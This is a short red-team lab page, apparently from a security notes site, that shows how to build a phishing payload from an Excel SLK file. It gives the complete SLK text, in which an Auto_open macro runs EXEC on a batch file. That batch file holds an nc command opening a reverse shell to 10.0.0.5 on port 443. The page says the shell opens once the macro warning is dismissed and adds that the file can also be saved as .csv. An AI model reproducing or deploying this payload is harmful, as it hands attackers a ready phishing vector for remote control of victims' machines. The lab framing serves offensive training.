Phishing: .SLK Excel
This lab is based on findings by @StanHacked - see below references for more info.

Weaponization

Create an new text file, put the the below code and save it as .slk file:
demo.slk
1
ID;P
2
O;E
3
NN;NAuto_open;ER101C1;KOut Flank;F
4
C;X1;Y101;K0;EEXEC("c:\shell.cmd")
5
C;X1;Y102;K0;EHALT()
6
E
Copied!
Note that the shell.cmd refers to a simple nc reverse shell batch file:
c:\shell.cmd
1
C:\tools\nc.exe 10.0.0.5 443 -e cmd.exe
Copied!

Execution

Once the macro warning is dismissed, the reverse shell pops as expected:
Since the file is actually a plain text file, detecting/triaging malicious intents are made easier.

Bonus

Note that the payload file could be saved as a .csv - note the additional warning though:

References

Last modified 3yr ago